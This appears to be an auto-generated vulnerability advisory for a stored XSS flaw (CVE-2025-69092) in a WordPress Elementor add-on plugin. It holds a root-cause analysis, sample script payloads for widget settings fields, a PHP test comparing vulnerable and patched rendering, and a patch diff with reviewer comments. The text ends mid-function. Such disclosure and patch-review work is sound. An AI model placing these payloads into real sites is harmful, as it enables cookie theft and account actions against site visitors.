Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69092: Essential Addons for Elementor <= 6.5.3 – Authenticated (Contributor+) Stored Cross-Site Scripting (essential-addons-for-elementor-lite)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 6.5.3
Patched Version 6.5.4
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69092:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Essential Addons for Elementor WordPress plugin. The vulnerability affects versions up to and including 6.5.3, allowing attackers with contributor-level access or higher to inject malicious scripts that execute when users view compromised pages. The CVSS score of 6.4 reflects the moderate severity of this stored XSS condition.

The root cause is insufficient output escaping in several plugin components. Atomic Edge research identified multiple code paths where user-controlled settings values were embedded directly into HTML attributes or inline style markup without escaping. The affected locations are the Event_Calendar element's data-detailsButtonText attribute (includes/Elements/Event_Calendar.php, line 3530), the Login_Register element's Cloudflare Turnstile data attributes (includes/Elements/Login_Register.php, line 7060), and the Image_Masking extension's style block generation (includes/Extensions/Image_Masking.php, lines 508, 525, 546, 565 and 584). None of these locations applied context-appropriate escaping before outputting the settings values.

Exploitation requires an authenticated attacker with contributor privileges or higher. The attacker would create or edit a page with Elementor, add one of the affected Essential Addons widgets (Event Calendar, Login Register, or Image Masking), and place a JavaScript payload in the widget's settings fields. For example, in the Event Calendar widget the 'Event Details Button Text' field could be set to a payload like '">alert(document.domain)'. When the page is saved and later viewed by any user, the script executes in the victim's browser context.

The patch in version 6.5.4 addresses the vulnerability by adding proper escaping functions. In Event_Calendar.php line 3530, the fix wraps wp_kses() output with esc_attr(). In Login_Register.php line 7060, data-theme and data-sitekey attributes now use esc_attr() for both variables. In Image_Masking.php, multiple lines receive esc_attr() or esc_html() wrappers for element IDs and style content. These changes ensure user-controlled data is properly encoded before being output to HTML, neutralizing XSS payloads while maintaining widget functionality.
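To make the context distinction behind the patch concrete, here is an added example (not Atomic Edge's analysis code and not the plugin's own code) that reproduces the shape of the Event_Calendar attribute and of the Image_Masking style block with two stand-in escapers. `esc_attr_like()` and `esc_html_like()` are assumed equivalents of WordPress's `esc_attr()`/`esc_html()` built on `htmlspecialchars()`; the `render_*` function names, the element id and the input values are constructed here; wp_kses() is not modelled. The example uses libxml's HTML parser to count the `<script>` elements a browser would create from each rendering, and then shows why `esc_html()` inside `<style>` is a break-out stop rather than a CSS encoder.

```php
<?php
// Added example, not the plugin's code. Stand-ins for the two WordPress escapers the
// 6.5.4 patch relies on, so the file runs without WordPress (assumption: both reduce
// to htmlspecialchars() with ENT_QUOTES for plain text). wp_kses() is not modelled.
function esc_attr_like(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
function esc_html_like(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Shape of the vulnerable Event_Calendar.php line: the setting is dropped into a
// double-quoted attribute with no attribute-context escaping.
function render_calendar_vulnerable(string $details_text): string {
    return '<div class="eael-event-calendar" data-detailsButtonText="' . $details_text . '"></div>';
}

// Shape of the patched line: esc_attr() applied to the attribute value.
function render_calendar_patched(string $details_text): string {
    return '<div class="eael-event-calendar" data-detailsButtonText="' . esc_attr_like($details_text) . '"></div>';
}

// Parse a fragment the way a browser would (libxml's HTML parser as the stand-in)
// and count the <script> elements that actually come into existence.
function count_script_elements(string $fragment): int {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $fragment . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

// Constructed input (not taken from any real site): closes the attribute, then
// opens a script element, the same shape as the PoC payload on this page.
$constructed = '"><script>alert(document.domain)</script>';

foreach (['vulnerable' => render_calendar_vulnerable($constructed),
          'patched'    => render_calendar_patched($constructed)] as $label => $html) {
    printf("%-10s %d <script> element(s): %s\n", $label, count_script_elements($html), $html);
}

// Image_Masking.php now wraps the finished CSS in esc_html() before echoing it into
// <style>. <style> is a raw-text element: the browser never decodes entities there,
// so this stops a </style> break-out but also rewrites any &, < or > that the
// settings-derived hover selector or mask URL contained.
function render_style_block(string $element_id, string $css): string {
    return '<style id="eael-image-masking-' . esc_attr_like($element_id) . '">'
         . esc_html_like($css) . '</style>';
}

// Constructed CSS: a child combinator in the selector and a query string in the
// mask URL, both legitimate CSS that the output escaping no longer leaves intact.
$css = '.eael-image-masking-abc123 > img {mask-image: url(https://example.invalid/m.svg?a=1&b=2);}';
echo render_style_block('abc123', $css), "\n";
```

Run it with the php CLI. The vulnerable rendering yields one script element and the patched rendering none, because the escaped value stays inside the attribute as `&quot;&gt;&lt;script&gt;...`. The style block prints with `&gt;` and `&amp;` inside the stylesheet text: harmless for XSS, but the selector and the URL no longer mean what the author wrote, which is why validating each interpolated piece at the point it is read (a URL escaper for the mask URL, an allow-list for the selector) is the cleaner long-term fix than escaping the finished CSS.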

Successful exploitation leads to stored XSS attacks where malicious scripts persist in the WordPress database and execute whenever users access compromised pages. Attackers can steal session cookies, perform actions as authenticated users, deface websites, or redirect visitors to malicious sites. The contributor-level requirement limits the attack surface, but many WordPress sites grant contributor access to multiple users, making this a significant threat to site security and user data.

Differential between vulnerable and patched code

Code Diff
--- a/essential-addons-for-elementor-lite/essential_adons_elementor.php
+++ b/essential-addons-for-elementor-lite/essential_adons_elementor.php
@@ -4,7 +4,7 @@
  * Description: The Essential plugin you install after Elementor! Packed with 100+ stunning elements like Data Table, Event Calendar, Filterable Gallery, WooCommerce.
  * Plugin URI: https://essential-addons.com/
  * Author: WPDeveloper
- * Version: 6.5.3
+ * Version: 6.5.4
  * Author URI: https://wpdeveloper.com/
  * Text Domain: essential-addons-for-elementor-lite
  * Domain Path: /languages
@@ -27,7 +27,7 @@
 define('EAEL_PLUGIN_BASENAME', plugin_basename(__FILE__));
 define('EAEL_PLUGIN_PATH', trailingslashit(plugin_dir_path(__FILE__)));
 define('EAEL_PLUGIN_URL', trailingslashit(plugins_url('/', __FILE__)));
-define('EAEL_PLUGIN_VERSION', '6.5.3');
+define('EAEL_PLUGIN_VERSION', '6.5.4');
 define('EAEL_ASSET_PATH', wp_upload_dir()['basedir'] . '/essential-addons-elementor');
 define('EAEL_ASSET_URL', wp_upload_dir()['baseurl'] . '/essential-addons-elementor');
 /**
--- a/essential-addons-for-elementor-lite/includes/Classes/Compatibility_Support.php
+++ b/essential-addons-for-elementor-lite/includes/Classes/Compatibility_Support.php
@@ -64,11 +64,11 @@
 	public function eael_mondialrelay_shipping_form_after() {
 		?>
 		<tr class="mrwp" style="display:none">
-			<th><?php echo __('Livraison Mondial Relay','essential-addons-for-elementor-lite');?>
+			<th><?php echo esc_html__('Livraison Mondial Relay','essential-addons-for-elementor-lite');?>
 			<br>
-			<em id="parcel_shop_info" class="parcel_shop_info"><?php echo __("Vous n'avez pas encore choisi de Point Relais®",'essential-addons-for-elementor-lite');?></em>
+			<em id="parcel_shop_info" class="parcel_shop_info"><?php echo esc_html__("Vous n'avez pas encore choisi de Point Relais®",'essential-addons-for-elementor-lite');?></em>
 			</th>
-			<td><a id="modaal_link" class="modaal_link" href="#modaal"><?php echo  __('Choisir un Point Relais®', 'essential-addons-for-elementor-lite'); ?></a></td>
+			<td><a id="modaal_link" class="modaal_link" href="#modaal"><?php echo  esc_html__('Choisir un Point Relais®', 'essential-addons-for-elementor-lite'); ?></a></td>
 		</tr>
 		<script>
 			jQuery(".modaal_link").modaal({
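Review bot: these three strings are fixed translation-file strings rather than request or settings data, so esc_html__() here hardens against a tampered .mo file and is not part of the stored XSS fix; fine to take, but keep it out of the CVE changelog entry so that reviewers do not look here for the vulnerable sink. The last changed line also keeps the double space in `echo  esc_html__(`.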
--- a/essential-addons-for-elementor-lite/includes/Classes/WPDeveloper_Setup_Wizard.php
+++ b/essential-addons-for-elementor-lite/includes/Classes/WPDeveloper_Setup_Wizard.php
@@ -272,7 +272,7 @@
 				'local_plugin_data' => $this->get_local_plugin_data( 'templately/templately.php' ),
 				'promo_img_url'     => EAEL_PLUGIN_URL . 'assets/admin/images/quick-setup/templately-qs-img.png',
 				'titles'            => [
-					__("5000+", "essential-addons-for-elementor-lite"),
+					__("6500+", "essential-addons-for-elementor-lite"),
 					__("Ready Templates", "essential-addons-for-elementor-lite")
 				],
 				'features' => [
--- a/essential-addons-for-elementor-lite/includes/Elements/Event_Calendar.php
+++ b/essential-addons-for-elementor-lite/includes/Elements/Event_Calendar.php
@@ -3527,7 +3527,7 @@
             data-monthColumnHeaderFormat = "' . esc_attr( $settings['eael_calendar_column_heading_month'] ) . '"
             data-weekColumnHeaderFormat = "' . esc_attr( $settings['eael_calendar_column_heading_week'] ) . '"
             data-hideDetailsLink= "' . esc_attr( $settings['eael_event_details_link_hide'] ) . '"
-            data-detailsButtonText = "' . wp_kses( $settings['eael_event_details_text'], Helper::eael_allowed_tags() ) . '"
+            data-detailsButtonText = "' . esc_attr( wp_kses( $settings['eael_event_details_text'], Helper::eael_allowed_tags() ) ) . '"
             data-location-display = "' . esc_attr( $settings['eael_event_location_display'] ) . '"
             data-events="' . esc_attr( htmlspecialchars( json_encode( $data ), ENT_QUOTES, 'UTF-8' ) ) . '"
             data-thumbnail_position = "' . ( !empty( $settings['eael_event_show_thumbnail'] ) ? esc_attr( $settings['eael_event_thumbnail_position'] ) : '') . '"
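Review bot: esc_attr() around wp_kses() stops the value from closing the data-detailsButtonText attribute, which is the CVE fix, but the stored value is still kses-filtered HTML, and whatever reads this data attribute on the client decides whether the allowed tags reach the DOM; confirm that Helper::eael_allowed_tags() permits no event-handler attributes or javascript: URLs before relying on it, or treat the setting as plain text and escape with esc_attr() alone. The neighbouring data-hideDetailsLink and data-location-display lines show the simpler pattern.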
--- a/essential-addons-for-elementor-lite/includes/Elements/Login_Register.php
+++ b/essential-addons-for-elementor-lite/includes/Elements/Login_Register.php
@@ -7057,7 +7057,7 @@
 		if ( ! empty( $this->cloudflare_turnstile_sitekey ) && 'yes' === $this->get_settings_for_display( "enable_cloudflare_turnstile" ) && ( 'yes' === $this->get_settings_for_display( "enable_cloudflare_turnstile_on_{$form_type}" ) ) ) {
 			$id = "eael-{$form_type}-cloudflare-turnstile-" . esc_attr( $this->get_id() );
 			wp_enqueue_script( 'eael-cloudflare' );
-			echo "<div class='cf-turnstile' data-theme='{$this->ds['cloudflare_turnstile_theme']}' data-sitekey='{$this->cloudflare_turnstile_sitekey}'></div>";
+			echo "<div class='cf-turnstile' data-theme='" . esc_attr( $this->ds['cloudflare_turnstile_theme'] ) . "' data-sitekey='" . esc_attr( $this->cloudflare_turnstile_sitekey ) . "'></div>";
 		}
 	}

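Review bot: esc_attr() encodes single quotes as well as double quotes (it runs with ENT_QUOTES), so the single-quoted data-theme and data-sitekey attributes are now safe. `$id` is computed on the second line of the hunk with esc_attr() applied to get_id() but is not used on any visible line; either it is consumed further down or the variable is dead. Consider printf() with the escaped values as arguments instead of string concatenation, which is the same shape that let the unescaped `{$this->ds['cloudflare_turnstile_theme']}` slip in originally.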
--- a/essential-addons-for-elementor-lite/includes/Elements/Product_Grid.php
+++ b/essential-addons-for-elementor-lite/includes/Elements/Product_Grid.php
@@ -3730,20 +3730,21 @@
 		                $args['total_post'] = $found_posts;

 		                // Add secondary image data attributes
-		                $secondary_image_data = '';
-		                if ( isset( $settings['eael_product_grid_show_secondary_image'] ) ) {
-		                    $secondary_image_data .= sprintf( ' data-ssi-desktop="%s"', esc_attr( $settings['eael_product_grid_show_secondary_image'] ) );
-		                    $secondary_image_data .= sprintf( ' data-ssi-tablet="%s"', esc_attr( $settings['eael_product_grid_show_secondary_image_tablet'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
-		                    $secondary_image_data .= sprintf( ' data-ssi-mobile="%s"', esc_attr( $settings['eael_product_grid_show_secondary_image_mobile'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
-		                }
+                        $this->add_render_attribute( 'eael-post-appender', 'class', [ 'products', 'eael-post-appender', 'eael-post-appender-' . $this->get_id() ] );
+                        if ( isset( $settings['eael_product_grid_show_secondary_image'] ) ) {
+                            $this->add_render_attribute( 'eael-post-appender', 'data-ssi-desktop' , esc_attr( $settings['eael_product_grid_show_secondary_image'] ) );
+                            $this->add_render_attribute( 'eael-post-appender', 'data-ssi-tablet' , esc_attr( $settings['eael_product_grid_show_secondary_image_tablet'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
+                            $this->add_render_attribute( 'eael-post-appender', 'data-ssi-mobile' , esc_attr( $settings['eael_product_grid_show_secondary_image_mobile'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
+                        }

-		                printf( '<ul class="products eael-post-appender" data-layout-mode="%s"%s>', esc_attr( $settings["eael_product_grid_layout"] ), $secondary_image_data );
+                        $this->add_render_attribute( 'eael-post-appender', 'data-layout-mode' , esc_attr( $settings['eael_product_grid_layout'] ) );
+                        echo '<ul '; $this->print_render_attribute_string( 'eael-post-appender' ); echo '>';

-                            while ( $query->have_posts() ) {
-                                $query->the_post();
-                                include( realpath( $template ) );
-                            }
-                            wp_reset_postdata();
+                        while ( $query->have_posts() ) {
+                            $query->the_post();
+                            include( realpath( $template ) );
+                        }
+                        wp_reset_postdata();

 		                echo '</ul>';
                         do_action( 'eael_woo_after_product_loop' );
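Review bot: the values handed to add_render_attribute() on the data-ssi-* and data-layout-mode lines are pre-escaped with esc_attr(), yet print_render_attribute_string() is what emits them; check whether that method already escapes on output (Elementor's attribute renderer does), in which case the inner esc_attr() is redundant. WordPress's esc_attr() does not re-encode existing entities, so the result is identical either way; it is noise rather than a bug. The replacement lines also switch to space indentation where the surrounding context uses tabs, and the `?? $settings['eael_product_grid_show_secondary_image']` fallbacks for tablet and mobile are correctly carried over.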
--- a/essential-addons-for-elementor-lite/includes/Extensions/Image_Masking.php
+++ b/essential-addons-for-elementor-lite/includes/Extensions/Image_Masking.php
@@ -497,7 +497,7 @@
 			$type = $settings['eael_image_masking_type'];
             $element_id = $element->get_id();
             $style = '';
-            $element->add_render_attribute( '_wrapper', 'class', 'eael-image-masking-' . $element_id );
+            $element->add_render_attribute( '_wrapper', 'class', 'eael-image-masking-' . esc_attr( $element_id ) );
 			if( 'clip' === $type ){
                 $clip_path_value = '';
                 if( 'yes' === $settings['eael_image_masking_enable_custom_clip_path'] ){
@@ -508,7 +508,7 @@
                     $clip_path_value = $this->clip_paths( $clip_path );
                 }
                 if( $clip_path_value ) {
-                    $style .= '.eael-image-masking-'.$element_id.' img {clip-path: '.$clip_path_value.'}';
+                    $style .= '.eael-image-masking-'. esc_html( $element_id ) .' img {clip-path: '.$clip_path_value.'}';
                 }

                 if( 'yes' === $settings['eael_image_masking_hover_effect'] ){
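Review bot: esc_html() on `$element_id` inside a CSS selector is not a CSS escape, and the id is Elementor-generated, so this line changes nothing for attacker-controlled input; the user-influenced part of this rule is `$clip_path_value` (custom clip-path when `eael_image_masking_enable_custom_clip_path` is 'yes', per the context above), which is still concatenated raw. The only protection for it, and for `$hover_selector` and `$mask_url` in the following hunks, is the esc_html() applied to the whole `$style` at the final echo, so validate each of these where it is read (the custom clip-path against a tight character allow-list, for example) rather than relying on output escaping alone.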
@@ -525,14 +525,14 @@
                         if( $hover_selector ){
                             $hover_selector = ' ' . trim( $hover_selector );
                         }
-                        $style .= '.eael-image-masking-'.$element_id.$hover_selector.':hover img {clip-path: '.$hover_clip_path_value.'}';
+                        $style .= '.eael-image-masking-'. esc_html( $element_id ) . $hover_selector . ':hover img {clip-path: '.$hover_clip_path_value.'}';
                     }

                     $hover_selector = $settings['eael_image_masking_hover_selector'];
                     if( $hover_selector ){
                         $hover_selector = ' ' . trim( $hover_selector );
                     }
-                    $style .= '.eael-image-masking-'.$element_id.$hover_selector.':hover img {clip-path: '.$hover_clip_path_value.'}';
+                    $style .= '.eael-image-masking-'. esc_html( $element_id ) . $hover_selector . ':hover img {clip-path: '.$hover_clip_path_value.'}';
                 }
 			} else if( 'image' === $type ) {
                 $svg = $element->get_settings_for_display( 'eael_image_masking_svg' );
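Review bot: `$hover_selector` comes straight from the `eael_image_masking_hover_selector` setting and is concatenated into the rule untouched on both changed lines, so a contributor can write arbitrary selector text into the stylesheet. The esc_html() at the final echo keeps that text from leaving the <style> element, but it also turns a legitimate child combinator (`>`) into `&gt;` and silently drops the rule; validate the selector here (an allow-list of selector characters, or at minimum rejecting `<`, `>` and `&`) so that safety does not depend on an escaper that also breaks correct input.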
@@ -546,7 +546,7 @@
                 }

                 if( $mask_url ) {
-                    $style .= '.eael-image-masking-'.$element_id.' img {mask-image: url('.$mask_url.'); -webkit-mask-image: url('.$mask_url.');}';
+                    $style .= '.eael-image-masking-'. esc_html( $element_id ) .' img {mask-image: url('.$mask_url.'); -webkit-mask-image: url('.$mask_url.');}';
                 }

                 if( 'yes' === $settings['eael_image_masking_hover_effect'] ){
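Review bot: `$mask_url` is interpolated into url(...) unquoted and unescaped on the changed line; a value containing `)` or whitespace terminates the url() token and starts a new declaration, and the esc_html() at the final echo does not touch those characters. Quote the URL and escape it at this point, for example `url("' . esc_url( $mask_url ) . '")`, and apply the same to `$hover_mask_url` in the next hunk.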
@@ -565,7 +565,7 @@
                         if( $hover_selector ){
                             $hover_selector = ' ' . trim( $hover_selector );
                         }
-                        $style .= '.eael-image-masking-'.$element_id. $hover_selector .':hover img {mask-image: url('.$hover_mask_url.'); -webkit-mask-image: url('.$hover_mask_url.');}';
+                        $style .= '.eael-image-masking-'. esc_html( $element_id ) . $hover_selector .':hover img {mask-image: url('.$hover_mask_url.'); -webkit-mask-image: url('.$hover_mask_url.');}';
                     }
                 }

@@ -584,7 +584,7 @@


             if( $style ){
-                echo '<style id="eael-image-masking-'.$element_id.'">'.$style.'</style>';
+                echo '<style id="eael-image-masking-'. esc_attr( $element_id ) .'">'. esc_html( $style ) .'</style>';
             }
         }
 	}
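Review bot: esc_html() over `$style` is the wrong function for <style> content: the element is raw text, the browser never decodes entities inside it, so any `&`, `<` or `>` that `$mask_url`, `$hover_selector` or `$clip_path_value` carried is emitted as `&amp;`, `&lt;` or `&gt;` and corrupts the CSS (a `?a=1&b=2` query string in a mask URL, a `>` combinator in the hover selector). It does prevent a `</style>` break-out, which is the security goal, so it is acceptable as a stopgap, but the cleaner fix is to validate each interpolated piece where it is read (esc_url() for the URLs, allow-lists for the selector and clip-path) and emit the finished CSS unescaped, or at least strip only `<` from the finished string, which keeps `</style>` out while leaving `&` and `>` usable. esc_attr() on the id attribute on the same line is correct.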
--- a/essential-addons-for-elementor-lite/includes/Extensions/Post_Duplicator.php
+++ b/essential-addons-for-elementor-lite/includes/Extensions/Post_Duplicator.php
@@ -78,7 +78,7 @@
 		}

 		if ( ! current_user_can( 'edit_post', $post_id ) ) {
-			wp_die( __( 'You do not have sufficient permissions to edit this post.', 'essential-addons-for-elementor-lite' ) );
+			wp_die( esc_html__( 'You do not have permissions to edit this post.', 'essential-addons-for-elementor-lite' ) );
 		}

 		$post = sanitize_post( get_post( $post_id ), 'db' );
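Review bot: besides adding esc_html__(), the message text changes from "You do not have sufficient permissions to edit this post." to "You do not have permissions to edit this post.", which orphans the existing translation of that string in every language file; if the intent was only escaping, keep the original wording.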
--- a/essential-addons-for-elementor-lite/includes/Traits/Admin.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Admin.php
@@ -48,6 +48,10 @@
             wp_enqueue_style( 'essential_addons_elementor-template-cloud-css', EAEL_PLUGIN_URL . 'assets/admin/css/cloud.css', false, EAEL_PLUGIN_VERSION );
         }

+        if ( isset( $hook ) && $hook == 'elementor_page_elementor-element-manager' ) {
+		    wp_enqueue_style( 'ea-icon-admin', EAEL_PLUGIN_URL . 'assets/admin/css/eaicon.css', array(), EAEL_PLUGIN_VERSION );
+        }
+
 	    if ( isset( $hook ) && $hook == 'toplevel_page_eael-settings' ) {
 		    wp_enqueue_style( 'eael-admin-icon-css', EAEL_PLUGIN_URL . 'includes/templates/admin/icons/style.css', array(), EAEL_PLUGIN_VERSION );
 		    wp_enqueue_style( 'eael-admin-css', EAEL_PLUGIN_URL . 'includes/templates/admin/eael-dashboard/dist/assets/ea-dashboard.css', array(), EAEL_PLUGIN_VERSION );
@@ -122,7 +126,7 @@
 				    ]
 			    ],
 			    'templately_promo'        => [
-				    'heading' => __( 'Unlock 5000+ Ready Templates', 'essential-addons-for-elementor-lite' ),
+				    'heading' => __( 'Unlock 6500+ Ready Templates', 'essential-addons-for-elementor-lite' ),
 				    'list'    => [
 					    __( 'Stunning Templates For All', 'essential-addons-for-elementor-lite' ),
 					    __( 'One-Click Full Site Import', 'essential-addons-for-elementor-lite' ),
@@ -1931,7 +1935,7 @@
                             postData += '&later=' + later;
                         }

-                        postData += '&nonce=<?php echo wp_create_nonce( 'wpnotice_dismiss_notice_bfcm_2025_notice' );?>';
+                        postData += '&nonce=<?php echo esc_attr( wp_create_nonce( 'wpnotice_dismiss_notice_bfcm_2025_notice' ) );?>';

                         httpRequest.open('POST', '<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>');
                         httpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
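Review bot: the nonce is written into a JavaScript single-quoted string literal, so esc_js() is the context-matching escaper rather than esc_attr(); wp_create_nonce() returns hex characters only, so the output is identical today, but the right function keeps the line safe if the interpolated value ever changes. The admin_url() line below already uses the context-appropriate esc_url().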
--- a/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php
@@ -183,27 +183,56 @@
 			$settings['show_load_more_text']       = $settings['eael_fg_loadmore_btn_text'];
 			$settings['layout_mode']               = isset( $settings['layout_mode'] ) ? $settings['layout_mode'] : 'masonry';

-			if ( ! empty( $args['fetch_acf_image'] ) && 'yes' === $args['fetch_acf_image'] && ! empty( $args['post__in'] ) ) {
-				$args['post_status'] = 'any';
-				$args['post_type'] = 'any';
-			}
-
 			$exclude_ids = json_decode( html_entity_decode( stripslashes ( $_POST['exclude_ids'] ) ) );
 			$args['post__not_in'] = ( !empty( $_POST['exclude_ids'] ) ) ? array_map( 'intval', array_unique($exclude_ids) ) : array();
 			$active_term_id = ( !empty( $_POST['active_term_id'] ) ) ? intval( $_POST['active_term_id'] ) : 0;
 			$active_taxonomy = ( !empty( $_POST['active_taxonomy'] ) ) ? sanitize_text_field( $_POST['active_taxonomy'] ) : '';

-			if ( ! empty( $args['post__not_in'] ) && ! empty( $args['post__in'] ) ) {
-				$args['post__in'] = array_diff( $args['post__in'], array_unique( $args['post__not_in'] ) );
-			}
+			// Check if this is a hybrid/combined query with ACF gallery
+			// Also check settings for hybrid query flag as backup (in case args encoding failed)
+			$is_hybrid_query = ( ! empty( $args['eael_dfg_enable_combined_query'] ) && 'yes' === $args['eael_dfg_enable_combined_query'] )
+				|| ( ! empty( $settings['eael_dfg_enable_combined_query'] ) && 'yes' === $settings['eael_dfg_enable_combined_query'] && 'yes' === $settings['fetch_acf_image_gallery'] );
+
+			if ( $is_hybrid_query && class_exists( 'ACF' ) && ! empty( $settings['eael_acf_gallery_keys'] ) ) {
+				// Build taxonomy map for ACF gallery attachments
+				$taxonomy_map = $this->build_dfg_acf_taxonomy_map( $args, $settings, $active_term_id, $active_taxonomy );
+
+				// Store globally for templates
+				global $eael_dfg_attachment_taxonomy_map;
+				$eael_dfg_attachment_taxonomy_map = $taxonomy_map['taxonomy_map'];
+
+				// Update args with the filtered post IDs
+				if ( ! empty( $taxonomy_map['post_ids'] ) ) {
+					$args['post__in'] = $taxonomy_map['post_ids'];
+					$args['post_type'] = 'any';
+					$args['post_status'] = 'any';
+					$args['tax_query'] = [];
+					$args['orderby'] = 'post__in';
+				}
+
+				// Apply exclusions
+				if ( ! empty( $args['post__not_in'] ) && ! empty( $args['post__in'] ) ) {
+					$args['post__in'] = array_values( array_diff( $args['post__in'], array_unique( $args['post__not_in'] ) ) );
+				}
+			} else {
+				// Standard ACF gallery handling (non-hybrid)
+				if ( ! empty( $args['fetch_acf_image'] ) && 'yes' === $args['fetch_acf_image'] && ! empty( $args['post__in'] ) ) {
+					$args['post_status'] = 'any';
+					$args['post_type'] = 'any';
+				}
+
+				if ( ! empty( $args['post__not_in'] ) && ! empty( $args['post__in'] ) ) {
+					$args['post__in'] = array_diff( $args['post__in'], array_unique( $args['post__not_in'] ) );
+				}

-			if( 0 < $active_term_id &&
-				!empty( $active_taxonomy ) &&
-				!empty($args['tax_query'])
-			) {
-				foreach ($args['tax_query'] as $key => $taxonomy) {
-					if (isset($taxonomy['taxonomy']) && $taxonomy['taxonomy'] === $active_taxonomy) {
-						$args['tax_query'][$key]['terms'] = [$active_term_id];
+				if( 0 < $active_term_id &&
+					!empty( $active_taxonomy ) &&
+					!empty($args['tax_query'])
+				) {
+					foreach ($args['tax_query'] as $key => $taxonomy) {
+						if (isset($taxonomy['taxonomy']) && $taxonomy['taxonomy'] === $active_taxonomy) {
+							$args['tax_query'][$key]['terms'] = [$active_term_id];
+						}
 					}
 				}
 			}
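Review bot: `$is_hybrid_query` becomes true when `$args['eael_dfg_enable_combined_query']` is 'yes', and the hunk's own comment ("in case args encoding failed") shows that `$args` is decoded from the request; the gate into the hybrid branch, which goes on to set post_type and post_status to 'any', should therefore be the saved widget setting only (`$settings['eael_dfg_enable_combined_query']` together with `fetch_acf_image_gallery`), with nothing taken from `$args` that the widget did not already allow. Two smaller points: the hybrid branch drops the `$active_term_id` tax_query rewrite that the else branch keeps (it is re-applied inside build_dfg_acf_taxonomy_map(), so say so in a comment), and the context line `json_decode( html_entity_decode( stripslashes( $_POST['exclude_ids'] ) ) )` feeds `array_unique()` without an is_array() check, which is a TypeError on PHP 8 when a non-empty `exclude_ids` is not a JSON array.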
@@ -302,6 +331,192 @@
 	}

 	/**
+	 * Build taxonomy map for Dynamic Filterable Gallery ACF attachments
+	 * Maps attachment IDs to their parent post's taxonomy classes for filtering
+	 *
+	 * @param array $args Query args
+	 * @param array $settings Widget settings
+	 * @param int $active_term_id Active filter term ID
+	 * @param string $active_taxonomy Active filter taxonomy
+	 * @return array Array with 'post_ids' and 'taxonomy_map'
+	 */
+	protected function build_dfg_acf_taxonomy_map( $args, $settings, $active_term_id = 0, $active_taxonomy = '' ) {
+		$_args = $args;
+		$_args['posts_per_page'] = -1;
+		$_args['fields'] = 'ids';
+
+		// Restore original post_type from settings (args may have 'any' from hybrid query encoding)
+		if ( ! empty( $settings['post_type'] ) && $settings['post_type'] !== 'by_id' ) {
+			$_args['post_type'] = $settings['post_type'];
+			$_args['post_status'] = 'publish';
+		}
+
+		// Remove post__in constraint to get all matching parent posts
+		unset( $_args['post__in'] );
+
+		// If filtering by a specific term, apply the filter to parent posts
+		if ( $active_term_id > 0 && ! empty( $active_taxonomy ) ) {
+			$_args['tax_query'] = [
+				[
+					'taxonomy' => $active_taxonomy,
+					'field' => 'term_id',
+					'terms' => [ $active_term_id ],
+				]
+			];
+		}
+
+		$query = new WP_Query( $_args );
+
+		$post_ids = [];
+		$taxonomy_map = [];
+
+		if ( $query->have_posts() ) {
+			while ( $query->have_posts() ) {
+				$query->the_post();
+				$parent_post_id = get_the_ID();
+
+				// Get parent post's taxonomy classes
+				$parent_taxonomy_classes = $this->get_dfg_post_taxonomy_classes( $parent_post_id, $settings );
+
+				// Include parent posts unless hidden
+				if ( ! isset( $settings['eael_gf_hide_parent_items'] ) || 'yes' !== $settings['eael_gf_hide_parent_items'] ) {
+					$post_ids[] = $parent_post_id;
+				}
+
+				// Get ACF gallery items
+				$acf_gallery = [];
+				if ( ! empty( $settings['eael_acf_gallery_keys'] ) ) {
+					foreach ( $settings['eael_acf_gallery_keys'] as $key ) {
+						$_acf_gallery = get_field( $key, $parent_post_id );
+						if ( ! empty( $_acf_gallery ) ) {
+							$acf_gallery = array_merge( $_acf_gallery, $acf_gallery );
+						}
+					}
+				}
+
+				if ( ! empty( $acf_gallery ) ) {
+					foreach ( $acf_gallery as $item ) {
+						$attachment_id = false;
+
+						if ( empty( $item['ID'] ) ) {
+							if ( 'integer' === gettype( $item ) ) {
+								$attachment_id = $item;
+							} else if ( 'string' === gettype( $item ) ) {
+								$attachment_id = HelperClass::eael_get_attachment_id_from_url( $item );
+							}
+
+							if ( ! $attachment_id ) {
+								continue;
+							}
+
+							$attachment = get_post( $attachment_id );
+							if ( ! is_object( $attachment ) || ! isset( $attachment->ID ) ) {
+								continue;
+							}
+						} else {
+							$attachment_id = $item['ID'];
+						}
+
+						$post_ids[] = $attachment_id;
+
+						// Map this attachment to its parent's taxonomy classes
+						if ( ! isset( $taxonomy_map[ $attachment_id ] ) ) {
+							$taxonomy_map[ $attachment_id ] = $parent_taxonomy_classes;
+						} else {
+							$taxonomy_map[ $attachment_id ] = array_unique(
+								array_merge( $taxonomy_map[ $attachment_id ], $parent_taxonomy_classes )
+							);
+						}
+					}
+				}
+			}
+		}
+		wp_reset_postdata();
+
+		return [
+			'post_ids' => array_unique( $post_ids ),
+			'taxonomy_map' => $taxonomy_map
+		];
+	}
+
+	/**
+	 * Get taxonomy classes for a post (for DFG ACF gallery parent posts)
+	 *
+	 * @param int $post_id Post ID
+	 * @param array $settings Widget settings
+	 * @return array Array of taxonomy slug classes
+	 */
+	protected function get_dfg_post_taxonomy_classes( $post_id, $settings ) {
+		$classes = [];
+		$post_type = get_post_type( $post_id );
+
+		// Get all taxonomies for this post type
+		$get_object_taxonomies = get_object_taxonomies( $post_type );
+		$taxonomies = wp_get_object_terms( $post_id, $get_object_taxonomies, array( "fields" => "slugs" ) );
+
+		if ( $taxonomies && ! is_wp_error( $taxonomies ) ) {
+			foreach ( $taxonomies as $taxonomy ) {
+				$classes[] = $taxonomy;
+			}
+		}
+
+		// Handle category child items
